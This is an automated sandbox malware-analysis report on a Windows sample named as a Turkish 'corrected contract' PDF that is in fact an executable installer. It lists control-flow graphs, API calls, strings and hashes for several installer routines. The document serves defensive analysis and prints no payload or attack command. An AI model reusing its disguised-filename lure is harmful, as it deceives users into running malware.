                              control_flow_graph 202 403fa1-403fb3 203 403fb9-403fbf 202->203 204 40411a-404129 202->204 203->204 205 403fc5-403fce 203->205 206 404178-40418d 204->206 207 40412b-404173 GetDlgItem * 2 call 4044a0 SetClassLongW call 40140b 204->207 208 403fd0-403fdd SetWindowPos 205->208 209 403fe3-403fea 205->209 211 4041cd-4041d2 call 4044ec 206->211 212 40418f-404192 206->212 207->206 208->209 216 403fec-404006 ShowWindow 209->216 217 40402e-404034 209->217 221 4041d7-4041f2 211->221 213 404194-40419f call 401389 212->213 214 4041c5-4041c7 212->214 213->214 238 4041a1-4041c0 SendMessageW 213->238 214->211 220 40446d 214->220 222 404107-404115 call 404507 216->222 223 40400c-40401f GetWindowLongW 216->223 224 404036-404048 DestroyWindow 217->224 225 40404d-404050 217->225 232 40446f-404476 220->232 229 4041f4-4041f6 call 40140b 221->229 230 4041fb-404201 221->230 222->232 223->222 231 404025-404028 ShowWindow 223->231 233 40444a-404450 224->233 235 404052-40405e SetWindowLongW 225->235 236 404063-404069 225->236 229->230 242 404207-404212 230->242 243 40442b-404444 DestroyWindow EndDialog 230->243 231->217 233->220 241 404452-404458 233->241 235->232 236->222 237 40406f-40407e GetDlgItem 236->237 244 404080-404097 SendMessageW IsWindowEnabled 237->244 245 40409d-4040a0 237->245 238->232 241->220 246 40445a-404463 ShowWindow 241->246 242->243 247 404218-404265 call 40655e call 4044a0 * 3 GetDlgItem 242->247 243->233 244->220 244->245 248 4040a2-4040a3 245->248 249 4040a5-4040a8 245->249 246->220 274 404267-40426c 247->274 275 40426f-4042ab ShowWindow KiUserCallbackDispatcher call 4044c2 EnableWindow 247->275 251 4040d3-4040d8 call 404479 248->251 252 4040b6-4040bb 249->252 253 4040aa-4040b0 249->253 251->222 255 4040f1-404101 SendMessageW 252->255 257 4040bd-4040c3 252->257 253->255 256 4040b2-4040b4 253->256 255->222 256->251 261 4040c5-4040cb call 40140b 257->261 262 4040da-4040e3 call 40140b 257->262 272 4040d1 261->272 262->222 271 4040e5-4040ef 262->271 271->272 272->251 274->275 278 4042b0 275->278 279 4042ad-4042ae 275->279 280 4042b2-4042e0 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 4042e2-4042f3 SendMessageW 280->281 282 4042f5 280->282 283 4042fb-40433a call 4044d5 call 403f82 call 406521 lstrlenW call 40655e SetWindowTextW call 401389 281->283 282->283 283->221 294 404340-404342 283->294 294->221 295 404348-40434c 294->295 296 40436b-40437f DestroyWindow 295->296 297 40434e-404354 295->297 296->233 299 404385-4043b2 CreateDialogParamW 296->299 297->220 298 40435a-404360 297->298 298->221 301 404366 298->301 299->233 300 4043b8-40440f call 4044a0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 299->300 300->220 306 404411-404424 ShowWindow call 4044ec 300->306 301->220 308 404429 306->308 308->233
                              APIs
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FDD
                              • ShowWindow.USER32(?), ref: 00403FFD
                              • GetWindowLongW.USER32(?,000000F0), ref: 0040400F
                              • ShowWindow.USER32(?,00000004), ref: 00404028
                              • DestroyWindow.USER32 ref: 0040403C
                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404055
                              • GetDlgItem.USER32(?,?), ref: 00404074
                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404088
                              • IsWindowEnabled.USER32(00000000), ref: 0040408F
                              • GetDlgItem.USER32(?,?), ref: 0040413A
                              • GetDlgItem.USER32(?,00000002), ref: 00404144
                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040415E
                              • SendMessageW.USER32(0000040F,00000000,?,?), ref: 004041AF
                              • GetDlgItem.USER32(?,00000003), ref: 00404255
                              • ShowWindow.USER32(00000000,?), ref: 00404276
                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404288
                              • EnableWindow.USER32(?,?), ref: 004042A3
                              • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 004042B9
                              • EnableMenuItem.USER32(00000000), ref: 004042C0
                              • SendMessageW.USER32(?,000000F4,00000000,?), ref: 004042D8
                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042EB
                              • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404315
                              • SetWindowTextW.USER32(?,00422F08), ref: 00404329
                              • ShowWindow.USER32(?,0000000A), ref: 0040445D
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                              • String ID:
                              • API String ID: 121052019-0
                              • Opcode ID: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                              • Instruction ID: 6cd4652e30ec862c23bd12a6162173760bab2c1fa5186c41ecc3a298f9dddab8
                              • Opcode Fuzzy Hash: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                              • Instruction Fuzzy Hash: 7FC1C0B1600204ABDB216F21EE49E2B3A69FB94709F41053EF751B51F0CB795882DB2E
                              Function 00403BF3 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 309 403bf3-403c0b call 406915 312 403c0d-403c1d call 406468 309->312 313 403c1f-403c56 call 4063ef 309->313 321 403c79-403ca2 call 403ec9 call 405ef8 312->321 317 403c58-403c69 call 4063ef 313->317 318 403c6e-403c74 lstrcatW 313->318 317->318 318->321 327 403d34-403d3c call 405ef8 321->327 328 403ca8-403cad 321->328 334 403d4a-403d6f LoadImageW 327->334 335 403d3e-403d45 call 40655e 327->335 328->327 329 403cb3-403ccd call 4063ef 328->329 333 403cd2-403cdb 329->333 333->327 338 403cdd-403ce1 333->338 336 403df0-403df8 call 40140b 334->336 337 403d71-403da1 RegisterClassW 334->337 335->334 352 403e02-403e0d call 403ec9 336->352 353 403dfa-403dfd 336->353 340 403da7-403deb SystemParametersInfoW CreateWindowExW 337->340 341 403ebf 337->341 343 403cf3-403cff lstrlenW 338->343 344 403ce3-403cf0 call 405e1d 338->344 340->336 345 403ec1-403ec8 341->345 346 403d01-403d0f lstrcmpiW 343->346 347 403d27-403d2f call 405df0 call 406521 343->347 344->343 346->347 351 403d11-403d1b GetFileAttributesW 346->351 347->327 355 403d21-403d22 call 405e3c 351->355 356 403d1d-403d1f 351->356 362 403e13-403e2d ShowWindow call 4068a5 352->362 363 403e96-403e97 call 405679 352->363 353->345 355->347 356->347 356->355 370 403e39-403e4b GetClassInfoW 362->370 371 403e2f-403e34 call 4068a5 362->371 366 403e9c-403e9e 363->366 368 403ea0-403ea6 366->368 369 403eb8-403eba call 40140b 366->369 368->353 374 403eac-403eb3 call 40140b 368->374 369->341 372 403e63-403e86 DialogBoxParamW call 40140b 370->372 373 403e4d-403e5d GetClassInfoW RegisterClassW 370->373 371->370 379 403e8b-403e94 call 403b43 372->379 373->372 374->353 379->345
                              APIs
                                • Part of subcall function 00406915: GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                • Part of subcall function 00406915: GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                              • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,76BF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe",00008001), ref: 00403C74
                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\polaritets,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,76BF3420), ref: 00403CF4
                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\polaritets,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D07
                              • GetFileAttributesW.KERNEL32(Call), ref: 00403D12
                              • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\polaritets), ref: 00403D5B
                                • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                              • RegisterClassW.USER32(004289C0), ref: 00403D98
                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DB0
                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DE5
                              • ShowWindow.USER32(00000005,00000000), ref: 00403E1B
                              • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E47
                              • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E54
                              • RegisterClassW.USER32(004289C0), ref: 00403E5D
                              • DialogBoxParamW.USER32(?,00000000,00403FA1,00000000), ref: 00403E7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                              • String ID: "C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\polaritets$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                              • API String ID: 1975747703-3224121536
                              • Opcode ID: 0ef04955f1a6976a10593322067df9edaff6e7f7a832361b73f8beed2d85b6c9
                              • Instruction ID: 6a74b9b34ded998ebd2751605f77428bf44f11e359ee0ac59d58ca77ea789e65
                              • Opcode Fuzzy Hash: 0ef04955f1a6976a10593322067df9edaff6e7f7a832361b73f8beed2d85b6c9
                              • Instruction Fuzzy Hash: 2C61B770200740BAD620AF669D46F2B3A7CEB84B45F81453FF941B61E2CB7D5942CB6D
                              Function 00403082 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 383 403082-4030d0 GetTickCount GetModuleFileNameW call 406011 386 4030d2-4030d7 383->386 387 4030dc-40310a call 406521 call 405e3c call 406521 GetFileSize 383->387 388 4032b2-4032b6 386->388 395 403110 387->395 396 4031f5-403203 call 40301e 387->396 398 403115-40312c 395->398 403 403205-403208 396->403 404 403258-40325d 396->404 400 403130-403139 call 40349e 398->400 401 40312e 398->401 408 40325f-403267 call 40301e 400->408 409 40313f-403146 400->409 401->400 406 40320a-403222 call 4034b4 call 40349e 403->406 407 40322c-403256 GlobalAlloc call 4034b4 call 4032b9 403->407 404->388 406->404 430 403224-40322a 406->430 407->404 434 403269-40327a 407->434 408->404 412 4031c2-4031c6 409->412 413 403148-40315c call 405fcc 409->413 417 4031d0-4031d6 412->417 418 4031c8-4031cf call 40301e 412->418 413->417 432 40315e-403165 413->432 425 4031e5-4031ed 417->425 426 4031d8-4031e2 call 406a02 417->426 418->417 425->398 433 4031f3 425->433 426->425 430->404 430->407 432->417 436 403167-40316e 432->436 433->396 437 403282-403287 434->437 438 40327c 434->438 436->417 439 403170-403177 436->439 440 403288-40328e 437->440 438->437 439->417 442 403179-403180 439->442 440->440 441 403290-4032ab SetFilePointer call 405fcc 440->441 445 4032b0 441->445 442->417 444 403182-4031a2 442->444 444->404 446 4031a8-4031ac 444->446 445->388 447 4031b4-4031bc 446->447 448 4031ae-4031b2 446->448 447->417 449 4031be-4031c0 447->449 448->433 448->447 449->417
                              APIs
                              • GetTickCount.KERNEL32 ref: 00403093
                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe,00000400), ref: 004030AF
                                • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe,80000000,00000003), ref: 00406015
                                • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                              • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe,C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe,80000000,00000003), ref: 004030FB
                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00403231
                              Strings
                              • Null, xrefs: 00403179
                              • Error launching installer, xrefs: 004030D2
                              • C:\Users\user\Desktop, xrefs: 004030DD, 004030E2, 004030E8
                              • "C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe", xrefs: 00403088
                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
                              • Inst, xrefs: 00403167
                              • soft, xrefs: 00403170
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403089
                              • C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, xrefs: 00403099, 004030A8, 004030BC, 004030DC
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                              • String ID: "C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                              • API String ID: 2803837635-1965954690
                              • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                              • Instruction ID: 0271efb430f2efbe2fca7880162b12dddab7439e54d706f300c55aed9b32fb97
                              • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                              • Instruction Fuzzy Hash: 7B51C071A01304ABDB209F65DD85B9E7FACAB09316F10407BF904B62D1D7789E818B5D
                              Function 0040655E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204stringCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 671 40655e-406567 672 406569-406578 671->672 673 40657a-406594 671->673 672->673 674 4067a4-4067aa 673->674 675 40659a-4065a6 673->675 677 4067b0-4067bd 674->677 678 4065b8-4065c5 674->678 675->674 676 4065ac-4065b3 675->676 676->674 679 4067c9-4067cc 677->679 680 4067bf-4067c4 call 406521 677->680 678->677 681 4065cb-4065d4 678->681 680->679 683 406791 681->683 684 4065da-40661d 681->684 685 406793-40679d 683->685 686 40679f-4067a2 683->686 687 406623-40662f 684->687 688 406735-406739 684->688 685->674 686->674 689 406631 687->689 690 406639-40663b 687->690 691 40673b-406742 688->691 692 40676d-406771 688->692 689->690 695 406675-406678 690->695 696 40663d-40665b call 4063ef 690->696 693 406752-40675e call 406521 691->693 694 406744-406750 call 406468 691->694 697 406781-40678f lstrlenW 692->697 698 406773-40677c call 40655e 692->698 707 406763-406769 693->707 694->707 702 40667a-406686 GetSystemDirectoryW 695->702 703 40668b-40668e 695->703 706 406660-406663 696->706 697->674 698->697 708 406718-40671b 702->708 709 4066a0-4066a4 703->709 710 406690-40669c GetWindowsDirectoryW 703->710 711 406669-406670 call 40655e 706->711 712 40671d-406720 706->712 707->697 713 40676b 707->713 708->712 714 40672d-406733 call 4067cf 708->714 709->708 715 4066a6-4066c4 709->715 710->709 711->708 712->714 717 406722-406728 lstrcatW 712->717 713->714 714->697 719 4066c6-4066cc 715->719 720 4066d8-4066f0 call 406915 715->720 717->714 725 4066d4-4066d6 719->725 728 4066f2-406705 SHGetPathFromIDListW CoTaskMemFree 720->728 729 406707-406710 720->729 725->720 726 406712-406716 725->726 726->708 728->726 728->729 729->715 729->726
                              APIs
                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406680
                              • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406696
                              • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004066F4
                              • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 004066FD
                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406728
                              • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406782
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                              • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                              • API String ID: 4024019347-4155442545
                              • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                              • Instruction ID: c1bee3e663878f3afad94de22ef935420ccf361ce06c76a1d76179cfc985cdfa
                              • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                              • Instruction Fuzzy Hash: 266146B1A043019BDB205F28DD80B6B77E4AF84318F65053FF646B32D1DA7D89A18B5E
                              Function 004055A6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 860 4055a6-4055bb 861 4055c1-4055d2 860->861 862 405672-405676 860->862 863 4055d4-4055d8 call 40655e 861->863 864 4055dd-4055e9 lstrlenW 861->864 863->864 866 405606-40560a 864->866 867 4055eb-4055fb lstrlenW 864->867 868 405619-40561d 866->868 869 40560c-405613 SetWindowTextW 866->869 867->862 870 4055fd-405601 lstrcatW 867->870 871 405663-405665 868->871 872 40561f-405661 SendMessageW * 3 868->872 869->868 870->866 871->862 873 405667-40566a 871->873 872->871 873->862
                              APIs
                              • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                              • lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                              • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                              • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll), ref: 00405613
                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                              • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll
                              • API String ID: 2531174081-2142441932
                              • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                              • Instruction ID: deb6953f75989b306d4e6df0e2073f5bc52164b7b2c012b705af3b177d86a23e
                              • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                              • Instruction Fuzzy Hash: 8F21B375900158BACB119FA5DD84ECFBF75EF45364F50803AF944B22A0C77A4A51CF68
                              Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 874 4026f1-40270a call 402d89 877 402710-402717 874->877 878 402c2f-402c32 874->878 880 402719 877->880 881 40271c-40271f 877->881 879 402c38-402c3e 878->879 880->881 883 402883-40288b 881->883 884 402725-402734 call 406481 881->884 883->878 884->883 887 40273a 884->887 888 402740-402744 887->888 889 4027d9-4027dc 888->889 890 40274a-402765 ReadFile 888->890 891 4027f4-402804 call 406094 889->891 892 4027de-4027e1 889->892 890->883 893 40276b-402770 890->893 891->883 903 402806 891->903 892->891 894 4027e3-4027ee call 4060f2 892->894 893->883 896 402776-402784 893->896 894->883 894->891 899 40278a-40279c MultiByteToWideChar 896->899 900 40283f-40284b call 406468 896->900 899->903 904 40279e-4027a1 899->904 900->879 906 402809-40280c 903->906 907 4027a3-4027ae 904->907 906->900 908 40280e-402813 906->908 907->906 909 4027b0-4027d5 SetFilePointer MultiByteToWideChar 907->909 910 402850-402854 908->910 911 402815-40281a 908->911 909->907 912 4027d7 909->912 913 402871-40287d SetFilePointer 910->913 914 402856-40285a 910->914 911->910 915 40281c-40282f 911->915 912->903 913->883 916 402862-40286f 914->916 917 40285c-402860 914->917 915->883 918 402831-402837 915->918 916->883 917->913 917->916 918->888 919 40283d 918->919 919->883
                              APIs
                              • ReadFile.KERNELBASE(?,?,?,?), ref: 0040275D
                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402798
                              • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004027BB
                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004027D1
                                • Part of subcall function 004060F2: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00406108
                              • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040287D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: File$Pointer$ByteCharMultiWide$Read
                              • String ID: 9
                              • API String ID: 163830602-2366072709
                              • Opcode ID: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                              • Instruction ID: 4938fc2aff7960a3a7fedf371d3c64c497049ea43b58312dd80c80f6ae9549af
                              • Opcode Fuzzy Hash: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
